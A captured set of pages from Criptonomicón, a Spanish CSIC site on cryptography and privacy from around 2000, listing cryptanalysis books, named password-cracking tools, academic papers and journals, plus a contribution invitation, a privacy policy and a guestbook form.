Tcnicas de criptoanlisis

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Tcnicas de criptoanlisis
Libros
Nuevo Electronic Frontier Foundation, Cracking DES Secrets of
Encryption, Research, Wiretap Politics & Chip Design, O'Reilly
&
Associates, 1998.

Control de acceso

Eli Biham, Adi Shamir, Differential Cryptanalysis of DES-like


cryptosystems, 1993.

CGI

Helen Fouch Gaines, Cryptanalysis, Dover Publications, Inc.,


1956.

Java

JavaScript

Abraham Sinkov, Elementary Cryptanalysis, Random House &


The L. W. Singer Company, 1968.

Herramientas

Crashes

L0phtCrack 2.0 para Win95/NT.


Asmodeus Security Scanner beta Release 1.04
Crypt Breaker's Workbench

Spam

PKZip Cracker
Remailers

Anonimato

Zip Crack
Solve-Vigenere
Wincrack

Correo seguro

Word Cracker
Web seguro

Susurros desde la Cripta

Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros

USA Army, "Basic Cryptanalysis", U.S. Government Printing Office, 1990.

Cookies

Agujeros

Divulgacin

WordPerfect Cracker: wpcrack_a y wpcrack_b


Unix password cracking

file:///C|/TEMP/criptonomicon/criptonomicon/criptoanalisis.html (1 of 2) [25/10/2000 02:30:41 p.m.]

Tcnicas de criptoanlisis
Consejos prcticos

Referencias

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/criptoanalisis.html (2 of 2) [25/10/2000 02:30:41 p.m.]

Artculos en revistas especializadas

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Artculos en revistas especializadas


D. Adlemann, J. Reeds, On the cryptanalysis of rotor and
substitution-permutation networks. IEEE Trans. on Inform.
Theory, 28(4), 578--584, 1982.

Linux

Navegacin segura

Control de acceso

CGI

D. Angluin, D. Lichtenstein, Provable Security in Crypto-systems:


a survey. Yale University, Department of Computer Science,
#288, 1983.
American National Standards Institute. Working Draft: American
National Standard X9.30-199X: Public Key Cryptography Using
Irreversible Algorithms for the Financial Services Industry: Part 1:
The Digital Signature Algorithm (DSA). American Bankers
Association, Washington, D.C., March 4, 1993.

Divulgacin
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas

Java

JavaScript

Cookies

Crashes

Otros

J.P. Barlow. Decrypting the puzzle palace. Communications of the ACM,


35(7):25--31, July 1992.
P. Beauchemin, G. Brassard, C. Crepeau, C. Goutier, and C. Pomerance. The
generation of random numbers that are probably prime. J. of Cryptology, 1:53--64,
1988.
John Bennett, Analysis of the Encryption Algorithm Used in the WordPerfect Word
Processing Program. Cryptologia 11(4), 206--210, 1987.

Agujeros

Spam

Remailers

Anonimato

H. A. Bergen and W. J. Caelli, File Security in WordPerfect 5.0. Cryptologia 15(1),


57--66, January 1991.
T. Beth y F.C. Piper, "The Stop-and-Go Generator". Proc. Eurocrypt'84,
Springer-Verlag Lecture Notes in Computer Science, No. 209, pp. 88-92, New York
1984.
T. Beth, Algorithm engineering for public key algorithms. IEEE Selected Areas of
Communication, 1(4), 458--466, 1990.

Correo seguro

Web seguro

Susurros desde la Cripta

E. Biham and A. Shamir, Differential cryptanalysis of DES-like cryptosystems.


Journal of Cryptology, vol. 4, #1, 3--72, 1991.
E. Biham, A. Shamir, Differential cryptanalysis of Snefru, Khafre, REDOC-II, LOKI
and LUCIFER. In Proceedings of CRYPTO '91, ed. by J. Feigenbaum, 156--171,
1992.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (1 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas


Consejos prcticos

Referencias

Libro de Visitas

E. Biham and A. Shamir. Differential cryptanalysis of the full 16-round DES. In


Advances in Cryptology --- Crypto '92, Springer-Verlag, New York, 1993.
M. Blum and S. Goldwasser. An efficient probabilistic public-key encryption scheme
which hides all partial information. In Advances in Cryptology --- Crypto '84, pages
289--299, Springer-Verlag, New York, 1985.
B. den Boer and A. Bosselaers. An attack on the last two rounds of MD4. In
Advances in Cryptology --- Crypto '91, pages 194--203, Springer-Verlag, New York,
1992.
J. BOYAR, "Inferring Sequences Produced by Pseudorandom Number Generators".
J. ACM. Vol. 36, No. 1, pp. 129-144, Jan. 1989.
J. Brandt and I. Damgard. On generation of probable primes by incremental search.
In Advances in Cryptology --- Crypto '92, Springer-Verlag, New York, 1993. [BRI
86] E. Brickell, J. Moore, M. Purtill, Structure in the S-boxes of DES. In Proceedings
of CRYPTO '86, A. M. Odlyzko ed., 3--8, 1987.
E.F. BRICKELL y A.M. ODLYZKO, "Cryptanalysis: A Survey of Recent Results".
Proc. IEEE. Vol. 76, No. 5, pp. 578-593, May. 1988.
J. Brillhart, D.H. Lehmer, J.L. Selfridge, B. Tuckerman, and S.S. Wagstaff Jr.
Factorizations of b^n +/- 1, b=2,3,5,6,7,10,11,12 up to High Powers. Volume 22 of
Contemporary Mathematics, American Mathematical Society, Providence, Rhode
Island, 2nd edition, 1988.
L. Brown, A proposed design for an extended DES, Computer Security in the
Computer Age. Elsevier Science Publishers B.V. (North Holland), IFIP, W. J. Caelli
ed., 9--22, 1989.
L. Brown, J. Pieprzyk, J. Seberry, LOKI - a cryptographic primitive for
authentication and secrecy applications. In Proceedings of AUSTCRYPT 90,
229--236, 1990.
M.V.D. Burmester, Y.G. Desmedt, and T. Beth. Efficient zero-knowledge
identification schemes for smart cards. Computer Journal, 35:21--29, 1992.
P. Caballero y A. Fuster: Algoritmo de clculo de una cuota inferior de la
complejidad lineal del filtrado no lineal. Actas de la III Reunin Espaola sobre
Criptologa. 1992, Nov. 1994.
H. Gustafson, E. Dawson, W. Caelli, Comparison of block ciphers. In Proceedings of
AUSCRYPT '90, J. Seberry and J. Piepryzk eds., 208--220, 1990.
K.W. Campbell and M.J. Wiener. Proof that DES is not a group. In Advances in
Cryptology --- Crypto '92, Springer-Verlag, New York, 1993.
John Carrol and Steve Martin, The Automated Cryptanalysis of Substitution Ciphers.
Cryptologia 10(4), 193--209, 1986.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (2 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

John Carrol and Lynda Robbins, Automated Cryptanalysis of Polyalphabetic


Ciphers. Cryptologia 11(4), 193--205, 1987.
W.G. CHAMBERS y D. GOLLMANN, "Generators for Sequences with
Near-Maximal Linear Equivalence". IEE Proceedings. Vol. 135, Pt E, No. 1, pp.
67-69, Jan. 1988.
Ben Zion Chor y Ronald L. Rivest: A knapsack-type public key cryptosystem based
on aritmetic in finite fields. IEEE Trans on Information Theory, 901--909, vol 34,
Sep, 1988.
D. Coppersmith: Fast evaluation of logarithms in fields of characteristic two. IEEE
Trans on Information Theory, 587--594, vol 30, Jul, 1984.
D. Coppersmith, A.M. Odlyzko, and R. Schroeppel. Discrete logarithms in GF(p).
Algorithmica, 1:1--15, 1986.
M. Davio, J. Goethals, Elements of cryptology. in Secure Digital Communications,
G. Longo ed., 1--57, 1983.
Dorothy E. Denning. The Clipper encryption system. American Scientist,
81(4):319--323, July--August 1993.
Dorothy E. Denning y Miles E. Smid: Key Escrowing Today. IEEE Communications
Magazine, 58--68, Sept. 1994.
W. Diffie and M.E. Hellman. New directions in cryptography. IEEE Transactions on
Information Theory, IT-22:644--654, 1976.
W. Diffie and M.E. Hellman. Exhaustive cryptanalysis of the NBS Data Encryption
Standard. Computer, 10:74--84, 1977.
W. Diffie, M. Hellman, Privacy and Authentication: An introduction to
cryptography. IEEE proceedings, 67(3), 397--427, 1979.
W. Diffie, The first ten years of public key cryptography. IEEE proceedings, 76(5),
560--577, 1988.
T. ElGamal. A public-key cryptosystem and a signature scheme based on discrete
logarithms. IEEE Transactions on Information Theory, IT-31:469--472, 1985.
Carl M. Ellison, A Solution of the Hebern Messages. Cryptologia, vol. XII, #3,
144-158, Jul 1988.
S. Even, O. Goldreich, DES-like functions can generate the alternating group. IEEE
Trans. on Inform. Theory, vol. 29, #6, 863--865, 1983.
H. Feistel, Cryptography and Computer Privacy. Scientific American, 228(5),
15--23, 1973.
H. Feistel, H, W. Notz, J. Lynn Smith. Some cryptographic techniques for
machine-to-machine data communications, IEEE proceedings, 63(11), 1545--1554,

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (3 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

1975.
A. Fiat and A. Shamir. How to prove yourself: Practical solutions to identification
and signature problems. In Advances in Cryptology --- Crypto '86, pages 186--194,
Springer-Verlag, New York, 1987.
A. Fster, D. De La Gua, J. Negrillo, F. Montoya. Estructuras no lineales para la
generacin de secuencias binarias de Aplicacin Criptogrfica. Actas Del IV
Simposium Nacional De La Union Cientifica Internacional De Radio. 1991. Pags
904 a 908. Septiembre. Caceres.
A. Fster, D. de la Gua, J. Negrillo, F. Montoya. Diseo e implementacin de
algoritmos de generacin de secuencias binarias. Actas de la I Reunion Espaola
sobre Criptografia. 1991. Octubre. Palma de Mallorca.
A. Fuster, R. E. Lillo: Visin probabilstica de las secuencias binarias de aplicacin
criptogrfica. Actas de la II Reunion Espaola sobre Criptografia. 1992. Octubre.
Madrid.
A. Fuster y P. Caballero: On the linear complexity of nonlinearly filtered
PN-sequences. Pre-Proceedings of the ASIACRPT'94 61--71. . Wollongong,
Australia, Nov 1994.
G. Garon, R. Outerbridge, DES watch: an examination of the sufficiency of the Data
Encryption Standard for financial institutions in the 1990's. Cryptologia, vol. XV, #3,
177--193, 1991.
P.R.Geffe, "How to Protect Data with Ciphers that Are Really Hard to Break".
Electronics. Vol. 46, No. 1, Jan. 1973.
Shafi Goldwasser, Silvio Micali, Probabilistic Encryption and How To Play Mental
Poker Keeping Secret All Partial Information. Proceedings of the Fourteenth Annual
ACM Symposium on Theory of Computing, 1982.
S. Goldwasser and S. Micali. Probabilistic encryption. J. of Computer and System
Sciences, 28:270--299, 1984.
D.M. Gordon and K.S. McCurley. Massively parallel computation of discrete
logarithms. In Advances in Cryptology --- Crypto '92, Springer-Verlag, New York,
1993.
D. de la Gua, F. Montoya, E. Valderrama y Ll. Porta: ASIC-CRIPTO: un circuito
integrado para el mdulo de seguridad del PLANBA. Actas de la III Reunin
Espaola sobre Criptologa. 1992, Nov. 1994.
D. de la Gua y A. Fuster: Arquitecturas criptogrficas a partir de productos
modulares. Actas de la III Reunin Espaola sobre Criptologa. 1992, Nov. 1994.
D. de la Gua y A. Fuster: Mdulo de Cifrado para Seguridad en Redes de
Transmisin de Datos. Actas del IX Symposium Nacional de la Union Cientfica
Internacional de Radio, 852--856. Las Palmas, Sep. 1994.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (4 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

J. Hastad. Solving simultaneous modular equations of low degree. SIAM J.


Computing, 17:336--241, 1988.
M.E. Hellman. A cryptanalytic time-memory trade off. IEEE Transactions on
Information Theory, IT-26:401--406, 1980.
M. Hellman, The mathematics of public key cryptography. Scientific American,
130--139, 1979.
L. Hernandez, F. Montoya, J. Muoz: Generacin de secuencias pseudoaleatorias
mediante funciones cuadrticas en Zpn y en su lmite proyectivo. Actas de la III
Reunin Espaola sobre Criptologa. 1992, Nov. 1994.
D. G. N. Hunter and A. R. McKenzie, Experiments with Relaxation Algorithms for
Breaking Simple Substitution Ciphers. Computer Journal 26(1), 1983.
B. Kaliski, R. Rivest, A. Sherman, Is the Data Encryption Standard a Group?, Journal
of Cryptology, vol. 1, #1, 1--36, 1988.
J. Kam, G. Davida, A structured design of substitution-permutation encryption
networks. IEEE Trans. Information Theory, 28(10), 747--753, 1978.
S. Kent. RFC 1422: Privacy Enhancement for Internet Electronic Mail, Part II:
Certificate-Based Key Management. Internet Activities Board, February 1993.
P. Kinnucan, Data encryption gurus: Tuchman and Meyer. Cryptologia, vol. II #4,
371--XXX, 1978.
King and Bahler, Probabilistic Relaxation in the Cryptanalysis of Simple Substitution
Ciphers. Cryptologia 16(3), 215--225, 1992.
King and Bahler, An Algorithmic Solution of Sequential Homophonic Ciphers.
Cryptologia 17(2), in press.
Martin Kochanski, A Survey of Data Insecurity Packages. Cryptologia 11(1), 1--15,
1987.
Martin Kochanski, Another Data Insecurity Package. Cryptologia 12(3), 165--177,
1988.
X. Lai, J. Massey, A proposal for a new block encryption standard. EUROCRYPT
90, 389--404, 1990.
S. Lakshmivarahan, Algorithms for public key cryptosystems. In Advances in
Computers, M. Yovtis ed., 22, Academic Press, 45--108, 1983.
B.A. LaMacchia and A.M. Odlyzko. Computation of discrete logarithms in prime
fields. Designs, Codes and Cryptography, 1:47--62, 1991.
S. Landau. Zero knowledge and the Department of Defense. Notices of the American
Mathematical Society, 35:5--12, 1988.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (5 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

A. Lempel, Cryptology in transition, Computing Surveys, 11(4), 285--304, 1979.


H.W. Lenstra Jr. Factoring integers with elliptic curves. Ann. of Math.,
126:649--673, 1987.
A.K. Lenstra and H.W. Lenstra Jr. Algorithms in number theory. In J. van Leeuwen,
editor, Handbook of Theoretical Computer Science, MIT Press/Elsevier, Amsterdam,
1990.
A.K. Lenstra and M.S. Manasse. Factoring with two large primes. In Advances in
Cryptology --- Eurocrypt '90, pages 72--82, Springer-Verlag, Berlin, 1991.
H.W. Lenstra Jr.: On the Cor-Rivest Knapsack Cryptosysthem. Journal of
Criptology, 149--155, vol 3, 1991.
C. Rackoff, M. Luby, How to construct psuedorandom permutations from
psuedorandom functions. SIAM Journal of Computing, vol. 17, #2, 373--386, 1988.
Michael Lucks, A Constraint Satisfaction Algorithm for the Automated Decryption
of Simple Substitution Ciphers. In CRYPTO '88.
J.L. Massey, "Shift-register synthesis and BCH decoding", IEEE Trans. Informat.
Theory, Vol. IT-15, pp. 122-127, Jan. 1969.
J. Massey, An introduction to contemporary cryptology. IEEE proceedings, 76(5),
533--549, 1988.
M. Matsui. Linear cryptanalysis method for DES cipher. In Advances in Cryptology
--- Eurocrypt '93, Springer-Verlag, Berlin, 1993.
R.C. Merkle and M.E. Hellman. Hiding information and signatures in trapdoor
knapsacks. IEEE Transactions on Information Theory, IT-24:525--530, 1978.
R.C. Merkle and M.E. Hellman. On the security of multiple encryption.
Communications of the ACM, 24:465--467, July 1981.
R. Merkle, Fast software encryption functions. In Proceedings of CRYPTO '90,
Menezes and Vanstone ed., 476--501, 1991.
E. Messmer. NIST stumbles on proposal for public-key encryption. Network World,
9(30), July 27, 1992.
C. Meyer, Ciphertext/plaintext and ciphertext/key dependence vs. number of rounds
for the Data Encryption Standard. AFIPS Conference proceedings, 47, 1119--1126,
1978.
S. Micali. Fair public-key cryptosystems. In Advances in Cryptology --- Crypto '92,
Springer-Verlag, New York, 1993.
V.S. Miller. Use of elliptic curves in cryptography. In Advances in Cryptology --Crypto '85, pages 417--426, Springer-Verlag, New York, 1986.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (6 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

J. Muoz Masqu, M. Romera y F. Montoya: Caos en sistemas finitos y secuencias


pseudo aleatorias para aplicaciones criptogrficas. Actas de la III Reunin Espaola
sobre Criptologa. 1992, Nov. 1994.
Data Encryption Standard. National Bureau of Standards, FIPS PUB 46, Washington,
DC, January 1977.
National Institute of Standards and Technology (NIST). FIPS Publication 81: DES
Modes of Operation. December 2, 1980. Originally issued by National Bureau of
Standards.
National Institute of Standards and Technology (NIST). FIPS Publication 46-1: Data
Encryption Standard. January 22, 1988. Originally issued by National Bureau of
Standards.
National Institute of Standards and Technology (NIST). The Digital Signature
Standard, proposal and discussion. Communications of the ACM, 35(7):36--54, July
1992.
National Institute of Standards and Technology (NIST). Publication XX:
Announcement and Specifications for a Digital Signature Standard (DSS). August
19, 1992.
National Institute of Standards and Technology (NIST). FIPS Publication 180:
Secure Hash Standard (SHS). May 11, 1993.
National Institute of Standards and Technology (NIST). A proposed Federal
Information Processing Standard for an Escrowed Encryption Standard (EES).
Federal Register, 58(145), July 30, 1993.
A.M. Odlyzko. Discrete logarithms in finite fields and their cryptographic
significance. In Advances in Cryptology --- Eurocrypt '84, pages 224--314,
Springer-Verlag, Berlin, 1984.
S. Peleg and A. Rosenfeld, Breaking Substitution Ciphers Using a Relaxation
Algorithm. CACM 22(11), 598--605, 1979.
Stephen C. Pohlig y Martin E. Hellman: An improved Algorithm for Computing
Logarithms over GF(p) and its Cryptographic Significance. IEEE Trans on
Information Theory, 106--110. Vol24, Jan 1978.
J. Pollard. Theorems of factorization and primality testing. Proc. Cambridge Philos.
Soc., 76:521--528, 1974.
J. Pollard. Monte Carlo method for factorization. BIT, 15:331--334, 1975.
M.O. Rabin. Digitalized signatures as intractable as factorization. Technical Report
MIT/LCS/TR-212, MIT, 1979.
J. Reeds, `Cracking' a Random Number Generator. Cryptologia 1(1), 20--26, 1977.
J. A. Reeds and P. J. Weinberger, File Security and the UNIX Crypt Command.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (7 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

AT&T Bell Laboratories Technical Journal, Vol. 63 #8, part 2, 1673--1684, October,
1984.
R.L. Rivest, A. Shamir, and L. Adleman. A method for obtaining digital signatures
and public-key cryptosystems. Communications of the ACM, 21(2):120--126,
February 1978.
R.L. Rivest. Cryptography. In J. van Leeuwen, editor, Handbook of Theoretical
Computer Science, MIT Press/Elsevier, Amsterdam, 1990.
R.L Rivest. The MD4 message digest algorithm. In Advances in Cryptology --Crypto '90, pages 303--311, Springer-Verlag, New York, 1991.
R.L. Rivest. Finding four million random primes. In Advances in Cryptology --Crypto '90, pages 625--626, Springer-Verlag, New York, 1991.
M. Romera, I. Jimenez, J. Negrillo: Generacin de secuencias cifrantes mediante
funciones caoticas. Actas de la I Reunion Espaola sobre Criptografia. 1991.
Octubre. Palma de Mallorca.
C.P. Schnorr. Efficient identification and signatures for smart cards. In Advances in
Cryptology --- Crypto '89, pages 239--251, Springer-Verlag, New York, 1990.
C. Shannon, Communication Theory of Secrecy Systems. Bell System Technical
Journal 28(4), 656--715, 1949.
M. Shand and J. Vuillemin. Fast implementations of RSA cryptography. In
Proceedings of the 11th IEEE Symposium on Computer Arithmetic, pages 252--259,
IEEE Computer Society Press, Los Alamitos, CA, 1993.
A. Shimizu, S. Miyaguchi, Fast data encipherment algorithm FEAL. EUROCRYPT
'87, 267--278, 1988.
K. Shirriff, C. Welch, A. Kinsman, Decoding a VCR Controller Code. Cryptologia
16(3), 227--234, 1992.
T. SIEGENTHALER ,"Correlation-immunity of nonlinear combining functions for
cryptographic applications", IEEE Trans. Informat. Theory, Vol. IT-30, pp. 776-780,
Sep. 1984.
R.D. Silverman. The multiple polynomial quadratic sieve. Math. Comp.,
48:329--339, 1987.
M.E. Smid and D.K. Branstad. Response to comments on the NIST proposed Digital
Signature Standard. In Advances in Cryptology --- Crypto '92, Springer-Verlag, New
York, 1993.
A. Sorkin, LUCIFER: a cryptographic algorithm. Cryptologia, 8(1), 22--35, 1984.
R. Spillman et al., Use of Genetic Algorithms in Cryptanalysis of Simple
Substitution Ciphers. Cryptologia 17(1), 31--44, 1993.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (8 of 9) [25/10/2000 02:30:42 p.m.]

Artculos en revistas especializadas

K.C. ZENG, C.H. YANG y T.R. RAO, "On the Linear Consistency Test (LCT) in
Cryptoanalysis with Applications", Proc. Crypto89, Springer-Verlag Lecture Notes
in Computer Science, No. 435, pp. 164-174, 1989.
K.C. ZENG, C.H. YANG y T.R. RAO, "Large Primes in Stream-Cipher
Cryptography", Proc. Auscrypt90, Springer-Verlag Lecture Notes in Computer
Science, No. 453, pp. 194-205, 1990

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (9 of 9) [25/10/2000 02:30:42 p.m.]

Revistas especializadas

Suscripcin gratis

Intimidad?

Artculos

Revistas especializadas
ACM Transactions on Information and System Security

Divulgacin

Seguridad

Linux

Navegacin segura

Control de acceso

Cryptobytes

Criptografa moderna

Cryptologia

Teora de nmeros y

Cryptosystems Journal
Designs, Codes and Cryptography

codificacin
Seguridad
Criptoanlisis

IEEE Transactions on Information Theory

Artculos

IEEE Transactions on Computer

Revistas

CGI

Java

JavaScript

IEEE Transactions on Communications

Otros

Infosecurity News
Intelligence Online

Cookies

Journal of Cryptology
Crashes

Agujeros

Journal of Computer Security


SC Magazine
Secure News

Spam

SIC Seguridad en Informtica y Comunicaciones


Remailers

Computer Law Observer

Anonimato

Correo seguro

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Web seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/revistas.html (1 of 2) [25/10/2000 02:30:42 p.m.]

Revistas especializadas
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/revistas.html (2 of 2) [25/10/2000 02:30:42 p.m.]

Otras fuentes de informacin

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Otras fuentes de informacin


Coleccin general de libros de Springer Verlag "Lecture notes in
Computer Science", subcoleccin Advances in Cryptology, donde
se recogen los Proceedings del AUSCRYPT (Australia),
CRYPTO (USA) y EUROCRYPT (EUROPA).

Divulgacin
Criptografa moderna
Teora de nmeros y

FIPS PUB 46-1 Data Encryption Standard (this is DES)


FIPS PUB 74 Guidelines for Implementing as Using the NBS
DES
FIPS PUB 81 DES Modes of Operation FIPS PUB 113 Computer
Data Authentication (using DES)
Las normas siguientes se pueden pedir a:

codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros

American National Standards Institute Sales Office, 1430 Broadway, New York, NY
10018. Phone 212.642.4900
ANSI X3.92-1981 Data Encryption Algorithm (identico a FIPS 46-1).

Cookies

ANSI X3.106-1983 DEA Modes of Operation (identico a FIPS 113).


Crashes

Direccin de Aegean Park Press, P.O. Box 2837, Laguna Hills, CA 92654-0837.
Contestador: 714-586-8811. Telfono 800 736-3587 y FAX : 714 586-8269.

Agujeros

Spam

Remailers

Anonimato

En Amazon.com, podris encontrar cientos de libros sobre criptografa y seguridad.


Podis encontrarlos buscando con la palabra clave cryptography.
Direccin de Add Link: c\Crcega 411, 3, 2, 08290-BARCELONA, Tel (93) 415
49 04, FAX (93)415 72 68. Es el principal representante de software cientfico en
Espaa: Mathematica, Maple, Simulink, Derive, Matlab, Mat Wedge, Systat,
Spyglass....

Correo seguro

Web seguro

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/otros.html (1 of 2) [25/10/2000 02:30:43 p.m.]

Otras fuentes de informacin


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/otros.html (2 of 2) [25/10/2000 02:30:43 p.m.]

Colaborar en el Criptonomicn

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Cmo colaborar con el Criptonomicn


El Criptonomicn es un espacio abierto para tu colaboracin y contribuciones.
Si has escrito una applet de Java capaz de violar las barreras de seguridad, o conoces
un agujero en CGI para UNIX, Windows 95 NT, o tienes un programa en
JavaScript o un control ActiveX que hace cosas que supuestamente no debera
hacer, o sabes de alguna versin de programa o aplicacin que sirve para
proteger/violar nuestra intimidad y recursos informticos, o lo que sea que consideres
merezca la pena aparecer en estas pginas, no dudes en comunicrmelo. Si resulta
adecuado, lo incluir en la seccin apropiada del Criptonomicn, junto con tu
nombre y link a tu pgina Web (si as lo deseas).
Asimismo, si posees material acerca de cualquier tema relacionado con la intimidad
y la privacidad en Internet, desde un punto de vista legal, jurdico, tcnico, filosfico
o prctico, y quieres compartirlo con otros cibernautas, puedes envirmelo a

Java

JavaScript

(si lo prefieres, puedes utilizar mi clave pblica PGP) y yo lo publicara siempre que
sea adecuado en la seccin apropiada del Criptonomicn, junto con tu nombre y link
a tu pgina Web (si as lo deseas).

Cookies

Espero vuestras colaboraciones!


Crashes

Agujeros

Spam

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/colaboracion.html (1 of 2) [25/10/2000 02:30:43 p.m.]

Colaborar en el Criptonomicn
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/colaboracion.html (2 of 2) [25/10/2000 02:30:43 p.m.]

Declaracin de poltica de privacidad

Suscripcin gratis

Tu privacidad es muy importante

Intimidad?

Todava resulta raro encontrarnos con sitios en Internet que declaren abiertamente su
poltica respecto a la privacidad, qu hacen con los datos que obtienen de los
usuarios que navegan por sus pginas y por qu se obtiene informacin acerca de
ellos. Esta pgina es un intento de sentar precedentes, de manera que cada vez sean
ms numerosos los sitios Web que voluntariamente ponen a disposicin de sus
visitantes su poltica respecto a la privacidad. Conmino desde aqu a todos los sitios
importantes a hacer lo mismo.

Artculos

Seguridad

Linux

Declaracin de poltica de privacidad


Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Criptonomicn es un servicio de informacin sobre las amenazas a la privacidad y


medios para defenderla publicado por Gonzalo lvarez Maran.
Se puede contactar conmigo por e-mail en:

Si lo deseas, puedes utilizar mi clave pblica PGP.


Cuando navegas por mi pginas topars con algunas en las cuales se extraen datos
acerca de tu mquina, navegador, sistema operativo, direccin de correo electrnico,
adems de hacer un seguimiento de qu pginas has visitado. Esta informacin es
almacenada en mi propia mquina y destruida peridicamente, ya que sirve a dos
propsitos:
Mostrar a los cibernautas los riesgos que corren cuando navegan por ah,
concienzarles de que la Red no es un medio annimo, ya que existe un amplio
abanico de ataques, desde los simplemente molestos a los verdaderamente
dainos.
Llevar un registro interno de la actividad de los usuarios en mis pginas, para
saber qu temas les atraen ms y en cules se detienen ms tiempo. De esta
forma puedo suministrar un mejor servicio en el futuro.
Bajo ningn concepto ser dicha informacin compartida con otras organizaciones
con fines comerciales o distintos.
Tambin encontrars pginas de ejemplos sobre el uso de cookies, en las cuales se te
enviarn cookies, que por supuesto eres libre de aceptar o rechazar. Slo sirven al
propsito de ilustrar su funcionamiento, con demostraciones de su uso. Bajo ningn
concepto afectan dichas cookies a tu intimidad.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/politicaseguridad.html (1 of 2) [25/10/2000 02:30:43 p.m.]

Declaracin de poltica de privacidad


Consejos prcticos

Dnde encontrar ms sobre privacidad

Referencias

El sitio de referencia en la Red espaola es la Agencia de Proteccin de Datos.

Libro de Visitas

Aspectos jurdicos y legales de Internet


Visita la excelente pgina administrada por Manuel Porras Quintela, sobre Derecho,
Informtica y Tecnologas de la Informacin y Comunicaciones. Si deseas saber en
qu situacin se encuentra el Derecho, en relacin con estos temas, tan slo tienes
que navegar por sus pginas y empaparte del conocimiento jurdico del final del
milenio.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/politicaseguridad.html (2 of 2) [25/10/2000 02:30:43 p.m.]

Libro de visitas

Suscripcin gratis

Intimidad?

Artculos

Este es el lugar adecuado para que deposites tus sugerencias, comentarios, crticas,
valoraciones, etc. Si deseas colaborar con alguna contribucin, lee antes la pgina
sobre colaboraciones.
Si quieres, tambin puedes calificar mis pginas.
Nombre (opcional):

Seguridad

Direccin E-mail (opcional):


Linux

Cmo llegaste hasta esta pgina?

Navegacin segura

Control de acceso

CGI

Qu seccin te ha parecido ms interesante?


Java

Boletn

Qu te ha parecido el Criptonomicn?

JavaScript

Bueno

Qu tema te gustara ver aadido?

Cookies

Crashes

Agujeros

Tus comentarios:
Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Deseo recibir el "Boletn del Criptonomicn", con informacin de cambios,


actualizaciones, noticias, etc. (en caso afirmativo, debes suministrar una direccin de
correo autntica).

file:///C|/TEMP/criptonomicon/criptonomicon/visitas.html (1 of 2) [25/10/2000 02:30:44 p.m.]

Libro de visitas

Borrar todo

Consejos prcticos

Referencias

Enviar

Si deseas aadir un link a mis pginas, puedes usar el siguiente logo:

Libro de Visitas

aadiendo el siguiente cdigo:


<a href="http://www.iec.csic.es/criptonomicon/"><img src="criptologo.gif"
border="0" alt="Criptonomicn" WIDTH="100" HEIGHT="54"></a>
Si en vez de utilizar imgenes slo quieres emplear texto, puedes copiar lo siguiente:
